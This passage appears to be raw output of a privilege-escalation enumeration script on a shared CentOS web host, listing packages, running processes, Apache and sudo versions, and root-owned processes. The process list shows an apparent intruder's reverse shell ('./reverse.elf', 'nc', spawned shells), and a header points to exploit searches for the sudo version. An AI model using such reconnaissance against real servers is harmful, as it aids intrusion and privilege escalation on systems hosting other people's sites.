  4791. os-prober-1.58-9.el7.x86_64
  4792. p11-kit-0.20.7-3.el7.x86_64
  4793. p11-kit-trust-0.20.7-3.el7.x86_64
  4794. pakchois-0.4-10.el7.x86_64
  4795. pam-1.1.8-18.el7.x86_64
  4796. pango-1.36.8-2.el7.x86_64
  4797. parted-3.1-28.el7.x86_64
  4798. passwd-0.79-4.el7.x86_64
  4799. pciutils-libs-3.5.1-1.el7.x86_64
  4800. pcre-8.32-15.el7_2.1.x86_64
  4801. pcre-devel-8.32-15.el7_2.1.x86_64
  4802. perl-5.16.3-291.el7.x86_64
  4803. perl-Archive-Tar-1.92-2.el7.noarch
  4804. perl-BSD-Resource-1.29.07-1.el7.x86_64
  4805. perl-Business-ISBN-2.06-2.el7.noarch
  4806. perl-Business-ISBN-Data-20120719.001-2.el7.noarch
  4807. perl-CGI-3.63-4.el7.noarch
  4808. perl-Carp-1.26-244.el7.noarch
  4809. perl-Compress-Raw-Bzip2-2.061-3.el7.x86_64
  4810. perl-Compress-Raw-Zlib-2.061-4.el7.x86_64
  4811. perl-Crypt-OpenSSL-Bignum-0.04-18.el7.x86_64
  4812. perl-Crypt-OpenSSL-RSA-0.28-7.el7.x86_64
  4813. perl-Crypt-OpenSSL-Random-0.04-21.el7.x86_64
  4814. perl-Crypt-SSLeay-0.64-5.el7.x86_64
  4815. perl-DBD-MySQL-4.023-5.el7.x86_64
  4816. perl-DBD-Pg-2.19.3-4.el7.x86_64
  4817. perl-DBI-1.627-4.el7.x86_64
  4818. perl-DB_File-1.830-6.el7.x86_64
  4819. perl-Data-Dumper-2.145-3.el7.x86_64
  4820. perl-Digest-1.17-245.el7.noarch
  4821. perl-Digest-HMAC-1.03-5.el7.noarch
  4822. perl-Digest-MD5-2.52-3.el7.x86_64
  4823. perl-Digest-SHA-5.85-3.el7.x86_64
  4824. perl-Encode-2.51-7.el7.x86_64
  4825. perl-Encode-Detect-1.01-13.el7.x86_64
  4826. perl-Encode-Locale-1.03-5.el7.noarch
  4827. perl-Error-0.17020-2.el7.noarch
  4828. perl-Exporter-5.68-3.el7.noarch
  4829. perl-ExtUtils-Install-1.58-291.el7.noarch
  4830. perl-ExtUtils-MakeMaker-6.68-3.el7.noarch
  4831. perl-ExtUtils-Manifest-1.61-244.el7.noarch
  4832. perl-ExtUtils-ParseXS-3.18-2.el7.noarch
  4833. perl-FCGI-0.74-8.el7.x86_64
  4834. perl-File-Listing-6.04-7.el7.noarch
  4835. perl-File-Path-2.09-2.el7.noarch
  4836. perl-File-Temp-0.23.01-3.el7.noarch
  4837. perl-Filter-1.49-3.el7.x86_64
  4838. perl-Geo-IP-1.43-3.el7.x86_64
  4839. perl-Getopt-Long-2.40-2.el7.noarch
  4840. perl-HTML-Parser-3.71-4.el7.x86_64
  4841. perl-HTML-Tagset-3.20-15.el7.noarch
  4842. perl-HTTP-Cookies-6.01-5.el7.noarch
  4843. perl-HTTP-Daemon-6.01-5.el7.noarch
  4844. perl-HTTP-Date-6.02-8.el7.noarch
  4845. perl-HTTP-Message-6.06-6.el7.noarch
  4846. perl-HTTP-Negotiate-6.01-5.el7.noarch
  4847. perl-HTTP-Tiny-0.033-3.el7.noarch
  4848. perl-IO-Compress-2.061-2.el7.noarch
  4849. perl-IO-HTML-1.00-2.el7.noarch
  4850. perl-IO-Socket-INET6-2.69-5.el7.noarch
  4851. perl-IO-Socket-IP-0.21-4.el7.noarch
  4852. perl-IO-Socket-SSL-1.94-5.el7.noarch
  4853. perl-IO-Tty-1.10-11.el7.x86_64
  4854. perl-IO-Zlib-1.10-291.el7.noarch
  4855. perl-LWP-MediaTypes-6.02-2.el7.noarch
  4856. perl-Linux-Pid-0.04-18.el7.x86_64
  4857. perl-Mail-DKIM-0.39-8.el7.noarch
  4858. perl-Mail-SPF-2.8.0-4.el7.noarch
  4859. perl-MailTools-2.12-2.el7.noarch
  4860. perl-Net-DNS-0.72-6.el7.x86_64
  4861. perl-Net-Daemon-0.48-5.el7.noarch
  4862. perl-Net-HTTP-6.06-2.el7.noarch
  4863. perl-Net-IP-1.26-4.el7.noarch
  4864. perl-Net-LibIDN-0.12-15.el7.x86_64
  4865. perl-Net-SMTP-SSL-1.01-13.el7.noarch
  4866. perl-Net-SSLeay-1.55-4.el7.x86_64
  4867. perl-NetAddr-IP-4.069-3.el7.x86_64
  4868. perl-Package-Constants-0.02-291.el7.noarch
  4869. perl-PathTools-3.40-5.el7.x86_64
  4870. perl-PlRPC-0.2020-14.el7.noarch
  4871. perl-Pod-Escapes-1.04-291.el7.noarch
  4872. perl-Pod-Perldoc-3.20-4.el7.noarch
  4873. perl-Pod-Simple-3.28-4.el7.noarch
  4874. perl-Pod-Usage-1.63-3.el7.noarch
  4875. perl-Scalar-List-Utils-1.27-248.el7.x86_64
  4876. perl-Socket-2.010-4.el7.x86_64
  4877. perl-Socket6-0.23-15.el7.x86_64
  4878. perl-Storable-2.45-3.el7.x86_64
  4879. perl-Switch-2.16-7.el7.noarch
  4880. perl-Sys-Syslog-0.33-3.el7.x86_64
  4881. perl-Test-Harness-3.28-3.el7.noarch
  4882. perl-Text-ParseWords-3.29-4.el7.noarch
  4883. perl-Time-HiRes-1.9725-3.el7.x86_64
  4884. perl-Time-Local-1.2300-2.el7.noarch
  4885. perl-TimeDate-2.30-2.el7.noarch
  4886. perl-URI-1.60-9.el7.noarch
  4887. perl-WWW-RobotRules-6.02-5.el7.noarch
  4888. perl-XML-NamespaceSupport-1.11-10.el7.noarch
  4889. perl-XML-Parser-2.41-10.el7.x86_64
  4890. perl-XML-SAX-0.99-9.el7.noarch
  4891. perl-XML-SAX-Base-1.08-7.el7.noarch
  4892. perl-XML-Simple-2.20-5.el7.noarch
  4893. perl-constant-1.27-2.el7.noarch
  4894. perl-devel-5.16.3-291.el7.x86_64
  4895. perl-libs-5.16.3-291.el7.x86_64
  4896. perl-libwww-perl-6.05-2.el7.noarch
  4897. perl-macros-5.16.3-291.el7.x86_64
  4898. perl-parent-0.225-244.el7.noarch
  4899. perl-podlators-2.5.1-3.el7.noarch
  4900. perl-threads-1.87-4.el7.x86_64
  4901. perl-threads-shared-1.43-6.el7.x86_64
  4902. perl-version-0.99.07-2.el7.x86_64
  4903. t.16-42.el7.x86_64
  4904. php-cli-5.4.16-42.el7.x86_64
  4905. php-common-5.4.16-42.el7.x86_64
  4906. php-gd-5.4.16-42.el7.x86_64
  4907. php-ldap-5.4.16-42.el7.x86_64
  4908. php-mbstring-5.4.16-42.el7.x86_64
  4909. php-mysql-5.4.16-42.el7.x86_64
  4910. php-odbc-5.4.16-42.el7.x86_64
  4911. php-pdo-5.4.16-42.el7.x86_64
  4912. php-pear-1.9.4-21.el7.noarch
  4913. php-pgsql-5.4.16-42.el7.x86_64
  4914. php-process-5.4.16-42.el7.x86_64
  4915. php-snmp-5.4.16-42.el7.x86_64
  4916. php-soap-5.4.16-42.el7.x86_64
  4917. php-xml-5.4.16-42.el7.x86_64
  4918. php-xmlrpc-5.4.16-42.el7.x86_64
  4919. pinentry-0.8.1-17.el7.x86_64
  4920. pixman-0.34.0-1.el7.x86_64
  4921. pkgconfig-0.27.1-4.el7.x86_64
  4922. plymouth-0.8.9-0.26.20140113.el7.centos.x86_64
  4923. plymouth-core-libs-0.8.9-0.26.20140113.el7.centos.x86_64
  4924. plymouth-scripts-0.8.9-0.26.20140113.el7.centos.x86_64
  4925. policycoreutils-2.5-11.el7_3.x86_64tc
  4926. polkit-0.112-12.el7_3.x86_64
  4927. polkit-pkla-compat-0.1-4.el7.x86_64
  4928. poppler-data-0.4.6-3.el7.noarch
  4929. popt-1.13-16.el7.x86_64
  4930. portreserve-0.0.5-11.el7.x86_64
  4931. postfix-2.10.1-6.el7.x86_64
  4932. postgresql-9.2.18-1.el7.x86_64
  4933. postgresql-libs-9.2.18-1.el7.x86_64
  4934. postgresql-server-9.2.18-1.el7.x86_64
  4935. ppp-2.4.5-33.el7.x86_64
  4936. procmail-3.22-35.el7.x86_64
  4937. procmail-wrapper-1.0-1.vm.x86_64
  4938. procps-ng-3.3.10-10.el7.x86_64
  4939. proftpd-1.3.5e-2.el7.x86_64
  4940. psmisc-22.20-11.el7.x86_64
  4941. pth-2.0.7-23.el7.x86_64
  4942. pygobject3-base-3.14.0-3.el7.x86_64
  4943. pygpgme-0.3-9.el7.x86_64
  4944. pyliblzma-0.5.3-11.el7.x86_64
  4945. pyparsing-1.5.6-9.el7.noarch
  4946. python-2.7.5-48.el7.x86_64
  4947. python-backports-1.0-8.el7.x86_64
  4948. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  4949. python-configobj-4.7.2-7.el7.noarch
  4950. python-decorator-3.4.0-3.el7.noarch
  4951. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  4952. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  4953. python-iniparse-0.4-9.el7.noarch
  4954. python-libs-2.7.5-48.el7.x86_64
  4955. python-perf-3.10.0-514.26.2.el7.x86_64
  4956. python-pycurl-7.19.0-19.el7.x86_64
  4957. python-pyudev-0.15-7.el7_2.1.noarch
  4958. python-setuptools-0.9.8-4.el7.noarch
  4959. python-slip-0.4.0-2.el7.noarch
  4960. python-slip-dbus-0.4.0-2.el7.noarch
  4961. python-urlgrabber-3.10-8.el7.noarch
  4962. pyxattr-0.5.1-5.el7.x86_64
  4963. qrencode-libs-3.4.1-3.el7.x86_64
  4964. quota-4.01-14.el7.x86_64
  4965. quota-nls-4.01-14.el7.noarch
  4966. readline-6.2-9.el7.x86_64
  4967. rest-0.7.92-5.el7.x86_64
  4968. rootfiles-8.1-11.el7.noarch
  4969. rpcbind-0.2.0-38.el7_3.1.x86_64
  4970. rpm-4.11.3-21.el7.x86_64
  4971. rpm-build-libs-4.11.3-21.el7.x86_64
  4972. rpm-libs-4.11.3-21.el7.x86_64
  4973. rpm-python-4.11.3-21.el7.x86_64
  4974. rsyslog-7.4.7-16.el7.x86_64
  4975. ruby-2.0.0.648-29.el7.x86_64
  4976. ruby-devel-2.0.0.648-29.el7.x86_64
  4977. ruby-irb-2.0.0.648-29.el7.noarch
  4978. ruby-libs-2.0.0.648-29.el7.x86_64
  4979. rubygem-bigdecimal-1.2.0-29.el7.x86_64
  4980. rubygem-io-console-0.4.2-29.el7.x86_64
  4981. rubygem-json-1.7.7-29.el7.x86_64
  4982. rubygem-psych-2.0.0-29.el7.x86_64
  4983. rubygem-rdoc-4.0.0-29.el7.noarch
  4984. rubygems-2.0.14.1-29.el7.noarch
  4985. scponly-4.8-18.el7.x86_64
  4986. sed-4.2.2-5.el7.x86_64
  4987. selinux-policy-3.13.1-102.el7_3.16.noarch
  4988. selinux-policy-targeted-3.13.1-102.el7_3.16.noarch
  4989. setup-2.8.71-7.el7.noarch
  4990. shadow-utils-4.1.5.1-24.el7.x86_64
  4991. shared-mime-info-1.1-9.el7.x86_64
  4992. slang-2.2.4-11.el7.x86_64
  4993. snappy-1.1.0-3.el7.x86_64
  4994. spamassassin-3.4.0-2.el7.x86_64
  4995. sqlite-3.7.17-8.el7.x86_64
  4996. subversion-1.7.14-10.el7.x86_64
  4997. subversion-libs-1.7.14-10.el7.x86_64
  4998. sudo-1.8.6p7-23.el7_3.x86_64
  4999. systemd-219-30.el7_3.9.x86_64
  5000. systemd-libs-219-30.el7_3.9.x86_64
  5001. systemd-sysv-219-30.el7_3.9.x86_64
  5002. systemtap-sdt-devel-3.0-7.el7.x86_64
  5003. sysvinit-tools-2.88-14.dsf.el7.x86_64
  5004. t1lib-5.1.2-14.el7.x86_64
  5005. tar-1.26-31.el7.x86_64
  5006. tcp_wrappers-7.6-77.el7.x86_64
  5007. tcp_wrappers-libs-7.6-77.el7.x86_64
  5008. teamd-1.25-4.el7.x86_64
  5009. trousers-0.3.13-1.el7.x86_64
  5010. tuned-2.7.1-3.el7_3.2.noarch
  5011. tzdata-2017b-1.el7.noarch
  5012. unixODBC-2.3.1-11.el7.x86_64
  5013. unzip-6.0-16.el7.x86_64
  5014. urw-fonts-2.4-16.el7.noarch
  5015. usermin-1.720-1.noarch
  5016. ust-virtual-server-theme-6.9-1.noarch
  5017. ustr-1.0.4-16.el7.x86_64
  5018. util-linux-2.23.2-33.el7_3.2.x86_64
  5019. vim-minimal-7.4.160-1.el7_3.1.x86_64
  5020. virt-what-1.13-8.el7.x86_64
  5021. virtualmin-base-5.0-4.rh.noarch
  5022. virtualmin-release-1.0-5.gpl.rhel.noarch
  5023. wbm-php-pear-1.6-1.noarch
  5024. wbm-ruby-gems-1.4-1.noarch
  5025. wbm-security-updates-4.5-1.noarch
  5026. wbm-virtual-server-5.99.gpl-1.noarch
  5027. wbm-virtualmin-awstats-5.1-1.noarch
  5028. wbm-virtualmin-dav-3.8-1.noarch
  5029. wbm-virtualmin-git-1.7-1.noarch
  5030. wbm-virtualmin-htpasswd-2.6-1.noarch
  5031. wbm-virtualmin-init-2.5-1.noarch
  5032. wbm-virtualmin-mailman-6.3-1.noarch
  5033. wbm-virtualmin-registrar-2.4-1.noarch
  5034. wbm-virtualmin-sqlite-1.4-1.noarch
  5035. wbm-virtualmin-svn-5.1-1.noarch
  5036. wbt-virtual-server-mobile-2.5-1.noarch
  5037. wbt-virtual-server-theme-9.3-1.noarch
  5038. webalizer-2.23_08-6.el7.x86_64
  5039. webmin-1.850-1.noarch
  5040. wget-1.14-13.el7.x86_64
  5041. which-2.20-7.el7.x86_64
  5042. wpa_supplicant-2.0-21.el7_3.x86_64
  5043. xfsprogs-4.5.0-10.el7_3.x86_64
  5044. xorg-x11-font-utils-7.5-20.el7.x86_64
  5045. xz-5.2.2-1.el7.x86_64
  5046. xz-libs-5.2.2-1.el7.x86_64
  5047. yum-3.4.3-150.el7.centos.noarch
  5048. yum-metadata-parser-1.1.4-10.el7.x86_64
  5049. yum-plugin-fastestmirror-1.1.31-40.el7.noarch
  5050. zip-3.0-11.el7.x86_64
  5051. zlib-1.2.7-17.el7.x86_64
  5052. zlib-devel-1.2.7-17.el7.x86_64
  5053.  
  5054. [+] Current processes
  5055. USER PID START TIME COMMAND
  5056. root 1 Apr01 150:20 /usr/lib/systemd/systemd
  5057. root 2 Apr01 0:11 [kthreadd]
  5058. root 3 Apr01 3:09 [ksoftirqd/0]
  5059. root 7 Apr01 2:17 [migration/0]
  5060. root 8 Apr01 0:00 [rcu_bh]
  5061. root 9 Apr01 250:48 [rcu_sched]
  5062. root 10 Apr01 2:25 [watchdog/0]
  5063. root 11 Apr01 2:22 [watchdog/1]
  5064. root 12 Apr01 2:24 [migration/1]
  5065. root 13 Apr01 10:43 [ksoftirqd/1]
  5066. root 15 Apr01 0:00 [kworker/1:0H]
  5067. root 16 Apr01 2:39 [watchdog/2]
  5068. root 17 Apr01 2:17 [migration/2]
  5069. root 18 Apr01 2:20 [ksoftirqd/2]
  5070. root 20 Apr01 0:00 [kworker/2:0H]
  5071. root 21 Apr01 2:13 [watchdog/3]
  5072. root 22 Apr01 3:06 [migration/3]
  5073. root 23 Apr01 6:25 [ksoftirqd/3]
  5074. root 27 Apr01 0:00 [kdevtmpfs]
  5075. root 28 Apr01 0:00 [netns]
  5076. root 29 Apr01 0:11 [khungtaskd]
  5077. root 30 Apr01 0:00 [writeback]
  5078. root 31 Apr01 0:00 [kintegrityd]
  5079. root 32 Apr01 0:00 [bioset]
  5080. root 33 Apr01 0:00 [kblockd]
  5081. root 34 Apr01 0:00 [md]
  5082. root 43 Apr01 118:29 [kswapd0]
  5083. root 44 Apr01 0:00 [ksmd]
  5084. root 45 Apr01 39:05 [khugepaged]
  5085. root 46 Apr01 0:00 [fsnotify_mark]
  5086. root 47 Apr01 0:00 [crypto]
  5087. root 55 Apr01 0:00 [kthrotld]
  5088. root 57 Apr01 0:00 [kmpath_rdacd]
  5089. root 58 Apr01 0:00 [kpsmoused]
  5090. root 60 Apr01 0:00 [ipv6_addrconf]
  5091. root 79 Apr01 0:00 [deferwq]
  5092. root 113 Apr01 2:24 [kauditd]
  5093. root 288 Apr01 0:00 [ata_sff]
  5094. root 291 Apr01 0:00 [scsi_eh_0]
  5095. root 292 Apr01 0:00 [scsi_tmf_0]
  5096. root 293 Apr01 0:00 [scsi_eh_1]
  5097. root 294 Apr01 0:00 [scsi_tmf_1]
  5098. root 297 Apr01 0:00 [mpt_poll_0]
  5099. root 298 Apr01 0:00 [mpt/0]
  5100. root 308 Apr01 0:00 [scsi_eh_2]
  5101. root 309 Apr01 0:00 [scsi_tmf_2]
  5102. root 312 Apr01 0:00 [ttm_swap]
  5103. root 395 Apr01 0:00 [kdmflush]
  5104. root 396 Apr01 0:00 [bioset]
  5105. root 403 Apr01 0:00 [kdmflush]
  5106. root 404 Apr01 0:00 [bioset]
  5107. root 421 Apr01 0:00 [xfsalloc]
  5108. root 422 Apr01 0:00 [xfs_mru_cache]
  5109. root 423 Apr01 0:00 [xfs-buf/dm-1]
  5110. root 424 Apr01 0:00 [xfs-data/dm-1]
  5111. root 425 Apr01 0:00 [xfs-conv/dm-1]
  5112. root 426 Apr01 0:00 [xfs-cil/dm-1]
  5113. root 427 Apr01 0:00 [xfs-reclaim/dm-]
  5114. root 428 Apr01 0:00 [xfs-log/dm-1]
  5115. root 429 Apr01 0:00 [xfs-eofblocks/d]
  5116. root 430 Apr01 85:39 [xfsaild/dm-1]
  5117. root 506 Apr01 94:55 /usr/lib/systemd/systemd-journald
  5118. root 598 Apr01 1:08 [kworker/1:1H]
  5119. root 603 Apr01 0:00 [xfs-buf/sda1]
  5120. root 604 Apr01 0:00 [xfs-data/sda1]
  5121. root 605 Apr01 0:00 [xfs-conv/sda1]
  5122. root 606 Apr01 0:00 [xfs-cil/sda1]
  5123. root 607 Apr01 0:00 [xfs-reclaim/sda]
  5124. root 608 Apr01 0:00 [xfs-log/sda1]
  5125. root 609 Apr01 0:00 [xfs-eofblocks/s]
  5126. root 610 Apr01 0:00 [xfsaild/sda1]
  5127. root 616 Apr01 6:57 [jbd2/sdb1-8]
  5128. root 617 Apr01 0:00 [ext4-rsv-conver]
  5129. root 633 Apr01 8:48 /sbin/auditd
  5130. root 657 Apr01 69:01 /usr/lib/systemd/systemd-logind
  5131. avahi 659 Apr01 8:45 avahi-daemon:
  5132. dbus 662 Apr01 129:30 /bin/dbus-daemon
  5133. avahi 665 Apr01 0:00 avahi-daemon:
  5134. root 667 Apr01 0:00 /usr/sbin/saslauthd
  5135. root 668 Apr01 0:00 /usr/sbin/saslauthd
  5136. root 669 Apr01 0:00 /usr/sbin/saslauthd
  5137. root 670 Apr01 0:00 /usr/sbin/saslauthd
  5138. root 671 Apr01 0:00 /usr/sbin/saslauthd
  5139. root 687 Apr01 0:00 /sbin/agetty
  5140. root 784 Apr01 32:00 /usr/sbin/NetworkManager
  5141. root 827 Apr01 215:12 /usr/sbin/vmtoolsd
  5142. root 883 Apr01 0:00 /usr/lib/vmware-vgauth/VGAuthService
  5143. root 946 Apr01 117:45 /usr/lib/vmware-caf/pme/bin/ManagementAgentHost
  5144. root 997 Apr01 0:26 [kworker/2:1H]
  5145. root 1183 Apr01 35:28 /usr/sbin/rsyslogd
  5146. root 1284 Apr01 0:00 /usr/sbin/dovecot
  5147. postgres 1327 Apr01 132:17 /usr/bin/postgres
  5148. dovecot 1339 Apr01 0:00 dovecot/anvil
  5149. root 1341 Apr01 0:00 dovecot/log
  5150. postgres 1419 Apr01 0:00 postgres:
  5151. postgres 1461 Apr01 0:26 postgres:
  5152. postgres 1463 Apr01 3:20 postgres:
  5153. postgres 1465 Apr01 3:19 postgres:
  5154. postgres 1466 Apr01 88:52 postgres:
  5155. postgres 1467 Apr01 136:22 postgres:
  5156. mailman 1703 Apr01 0:00 /usr/bin/python
  5157. mailman 1709 Apr01 42:35 /usr/bin/python
  5158. mailman 1710 Apr01 43:59 /usr/bin/python
  5159. mailman 1717 Apr01 42:48 /usr/bin/python
  5160. mailman 1718 Apr01 42:10 /usr/bin/python
  5161. mailman 1724 Apr01 42:18 /usr/bin/python
  5162. mailman 1725 Apr01 44:08 /usr/bin/python
  5163. mailman 1726 Apr01 42:25 /usr/bin/python
  5164. mailman 1729 Apr01 0:25 /usr/bin/python
  5165. root 1855 Apr01 1:41 /usr/libexec/postfix/master
  5166. postfix 1881 Apr01 0:45 qmgr
  5167. root 3170 19:50 0:00 [kworker/1:0]
  5168. enfyfis 4562 13:50 6:34 /bin/php-cgi
  5169. enfyfis 4678 13:53 1:18 /bin/php-cgi
  5170. esingen+ 6403 Sep08 0:02 php
  5171. esingen+ 6405 Sep08 0:00 rm
  5172. root 7432 Nov17 0:00 [kworker/3:0H]
  5173. postfix 8100 20:56 0:00 pickup
  5174. root 8264 21:00 0:00 /usr/sbin/CROND
  5175. root 8269 21:00 0:00 /bin/bash
  5176. root 8271 21:00 0:00 sleep
  5177. root 9004 14:52 0:00 [kworker/0:0H]
  5178. root 9071 21:08 0:00 [kworker/u8:0]
  5179. imeymat 9334 14:56 0:44 /bin/php-cgi
  5180. imeymat 9357 14:56 0:43 /bin/php-cgi
  5181. root 9931 21:20 0:01 [kworker/3:0]
  5182. program+ 10469 21:26 0:00 /bin/sh
  5183. program+ 10471 21:27 0:00 python
  5184. program+ 10472 21:27 0:00 /bin/bash
  5185. program+ 10856 21:30 0:00 /bin/sh
  5186. program+ 10865 21:30 0:00 python
  5187. program+ 10866 21:30 0:00 /bin/bash
  5188. program+ 10881 21:31 0:00 ./reverse.elf
  5189. program+ 10890 21:31 0:00 /bin/sh
  5190. program+ 10892 21:31 0:00 python
  5191. program+ 10893 21:31 0:00 /bin/bash
  5192. economi+ 11248 Nov19 0:31 /bin/php-cgi
  5193. root 11254 21:36 0:00 [kworker/0:1H]
  5194. apache 11414 Nov19 0:11 /usr/sbin/httpd
  5195. default 11459 Nov19 0:04 /bin/php-cgi
  5196. program+ 11713 21:43 0:00 nc
  5197. economi+ 13219 Nov19 0:32 /bin/php-cgi
  5198. indess 13476 08:37 1:57 /bin/php-cgi
  5199. indess 13486 08:37 2:01 /bin/php-cgi
  5200. indess 13512 08:39 2:02 /bin/php-cgi
  5201. root 13686 Jul10 26:57 /usr/bin/perl
  5202. root 13725 Jul10 3:14 /usr/sbin/crond
  5203. root 13777 Jul10 0:00 /usr/lib/systemd/systemd-udevd
  5204. caiv 13904 02:01 0:01 /bin/php-cgi
  5205. root 14519 21:55 0:00 [kworker/2:0]
  5206. root 15247 22:05 0:00 [kworker/0:1]
  5207. root 15438 09:01 0:00 [kworker/3:2H]
  5208. ccsocia+ 15463 22:05 0:21 /bin/php-cgi
  5209. ccsocia+ 15467 22:05 0:05 /bin/php-cgi
  5210. root 15688 22:10 0:00 [kworker/u8:1]
  5211. root 15717 22:10 0:00 [kworker/0:0]
  5212. masingi+ 15920 02:02 0:01 /bin/php-cgi
  5213. apache 15940 22:12 0:00 /usr/sbin/httpd
  5214. apache 15952 22:12 0:00 /usr/sbin/httpd
  5215. apache 15958 22:12 0:00 /usr/sbin/httpd
  5216. program+ 15970 22:12 0:02 /bin/php-cgi
  5217. program+ 15983 22:13 0:02 /bin/php-cgi
  5218. root 16017 22:15 0:00 [kworker/3:1]
  5219. root 16173 22:15 0:00 [kworker/2:2]
  5220. apache 16300 22:15 0:00 /usr/sbin/httpd
  5221. apache 16302 22:15 0:00 /usr/sbin/httpd
  5222. root 16310 22:15 0:00 [kworker/1:1]
  5223. epsalge+ 16317 22:15 0:24 /bin/php-cgi
  5224. epsalge+ 16320 22:15 0:12 /bin/php-cgi
  5225. apache 16352 22:15 0:00 /usr/sbin/httpd
  5226. apache 16354 22:15 0:00 /usr/sbin/httpd
  5227. apache 16368 22:15 0:00 /usr/sbin/httpd
  5228. program+ 16432 22:17 0:01 /bin/php-cgi
  5229. root 16520 22:20 0:00 [kworker/0:2]
  5230. root 16559 22:20 0:00 [kworker/3:2]
  5231. root 16709 22:20 0:00 [kworker/1:2]
  5232. apache 16715 22:21 0:00 /usr/sbin/httpd
  5233. apache 16717 22:21 0:00 /usr/sbin/httpd
  5234. program+ 16778 22:22 0:00 /bin/sh
  5235. epsalge+ 16794 22:23 0:01 /bin/php-cgi
  5236. ciencias 16874 09:24 18:29 /bin/php-cgi
  5237. root 16951 Jul10 3:46 /usr/bin/perl
  5238. root 16993 Jul10 0:00 /usr/sbin/lvmetad
  5239. ciencias 17130 09:25 19:33 /bin/php-cgi
  5240. ciencias 17131 09:25 18:25 /bin/php-cgi
  5241. named 17168 Jul10 2:15 /usr/sbin/named
  5242. apache 17181 22:23 0:00 /usr/sbin/httpd
  5243. apache 17183 22:23 0:00 /usr/sbin/httpd
  5244. apache 17184 22:23 0:00 /usr/sbin/httpd
  5245. program+ 17187 22:24 0:00 python
  5246. polkitd 17279 Jul10 24:21 /usr/lib/polkit-1/polkitd
  5247. root 17317 Jul10 23:03 /usr/bin/python
  5248. root 17393 Jul10 18:31 /usr/bin/python
  5249. program+ 17550 22:24 0:00 /bin/sh
  5250. nobody 17551 Jul10 4:31 proftpd:
  5251. program+ 17552 22:24 0:00 ps
  5252. program+ 17553 22:24 0:00 awk
  5253. root 17570 Jul10 20:51 /usr/sbin/irqbalance
  5254. gradosi+ 17812 Nov19 0:07 /bin/php-cgi
  5255. gradosi+ 17815 Nov19 0:06 /bin/php-cgi
  5256. epsalge+ 18903 09:46 0:20 /bin/php-cgi
  5257. epsalge+ 21029 10:16 0:12 /bin/php-cgi
  5258. master 23413 Nov19 4:21 /bin/php-cgi
  5259. iuila 23652 10:53 0:17 /bin/php-cgi
  5260. iuila 23659 10:53 0:19 /bin/php-cgi
  5261. iuila 23660 10:53 0:10 /bin/php-cgi
  5262. zabbix 24484 Jul10 0:00 zabbix_agentd
  5263. zabbix 24486 Jul10 48:20 zabbix_agentd:
  5264. zabbix 24487 Jul10 34:06 zabbix_agentd:
  5265. zabbix 24488 Jul10 34:10 zabbix_agentd:
  5266. zabbix 24489 Jul10 34:18 zabbix_agentd:
  5267. zabbix 24490 Jul10 33:59 zabbix_agentd:
  5268. zabbix 24491 Jul10 33:51 zabbix_agentd:
  5269. master 26882 Nov19 4:41 /bin/php-cgi
  5270. root 27667 Oct27 0:00 /usr/sbin/sshd
  5271. mysql 27785 Oct27 0:00 /bin/sh
  5272. mysql 28086 Oct27 205:44 /usr/libexec/mysqld
  5273. root 28228 Oct27 10:06 /usr/sbin/httpd
  5274. imeymat 30637 Nov19 0:02 /bin/php-cgi
  5275.  
  5276. [+] Apache Version and Modules
  5277. Server version: Apache/2.4.6 (CentOS)
  5278. Server built: Jul 6 2017 19:50:55
  5279. Compiled in modules:
  5280. core.c
  5281. mod_so.c
  5282. http_core.c
  5283.  
  5284. [+] Apache Config File
  5285.  
  5286. [+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
  5287. Sudo version 1.8.6p7
  5288. Sudoers policy plugin version 1.8.6p7
  5289. Sudoers file grammar version 42
  5290. Sudoers I/O plugin version 1.8.6p7
  5291.  
  5292. [*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
  5293.  
  5294. root 403 Apr01 0:00 [kdmflush]
  5295. root 309 Apr01 0:00 [scsi_tmf_2]
  5296. root 17317 Jul10 23:03 /usr/bin/python
  5297. Possible Related Packages:
  5298. dbus-python-1.1.1-9.el7.x86_64
  5299. libselinux-python-2.5-6.el7.x86_64
  5300. newt-python-0.52.15-4.el7.x86_64
  5301. python-2.7.5-48.el7.x86_64
  5302. python-backports-1.0-8.el7.x86_64
  5303. python-backports-ssl_match_hostname-3.4.0.2-4.el7.noarch
  5304. python-configobj-4.7.2-7.el7.noarch
  5305. python-decorator-3.4.0-3.el7.noarch
  5306. python-dns-1.12.0-2.20150617git465785f.el7.noarch
  5307. python-firewall-0.4.3.2-8.1.el7_3.3.noarch
  5308. python-iniparse-0.4-9.el7.noarch
  5309. python-libs-2.7.5-48.el7.x86_64
  5310. python-perf-3.10.0-514.26.2.el7.x86_64
  5311. python-pycurl-7.19.0-19.el7.x86_64
  5312. python-pyudev-0.15-7.el7_2.1.noarch
  5313. python-setuptools-0.9.8-4.el7.noarch
  5314. python-slip-0.4.0-2.el7.noarch
  5315. python-slip-dbus-0.4.0-2.el7.noarch
  5316. python-urlgrabber-3.10-8.el7.noarch
  5317. rpm-python-4.11.3-21.el7.x86_64
  5318. root 11 Apr01 2:22 [watchdog/1]
  5319. root 1341 Apr01 0:00 dovecot/log
  5320. Possible Related Packages:
  5321. centos-logos-70.0.6-3.el7.centos.noarch
  5322. logrotate-3.8.6-12.el7.x86_64
  5323. perl-Sys-Syslog-0.33-3.el7.x86_64
  5324. rsyslog-7.4.7-16.el7.x86_64
  5325. root 16520 22:20 0:00 [kworker/0:2]
  5326. root 617 Apr01 0:00 [ext4-rsv-conver]
  5327. root 671 Apr01 0:00 /usr/sbin/saslauthd
  5328. root 16017 22:15 0:00 [kworker/3:1]
  5329. root 421 Apr01 0:00 [xfsalloc]
  5330. root 12 Apr01 2:24 [migration/1]
  5331. root 21 Apr01 2:13 [watchdog/3]
  5332. root 55 Apr01 0:00 [kthrotld]
  5333. root 16993 Jul10 0:00 /usr/sbin/lvmetad
  5334. root 60 Apr01 0:00 [ipv6_addrconf]
  5335. root 3 Apr01 3:09 [ksoftirqd/0]
  5336. root 598 Apr01 1:08 [kworker/1:1H]
  5337. root 293 Apr01 0:00 [scsi_eh_1]
  5338. root 34 Apr01 0:00 [md]
  5339. root 294 Apr01 0:00 [scsi_tmf_1]
  5340. root 606 Apr01 0:00 [xfs-cil/sda1]
  5341. root 8 Apr01 0:00 [rcu_bh]
  5342. root 827 Apr01 215:12 /usr/sbin/vmtoolsd
  5343. root 609 Apr01 0:00 [xfs-eofblocks/s]
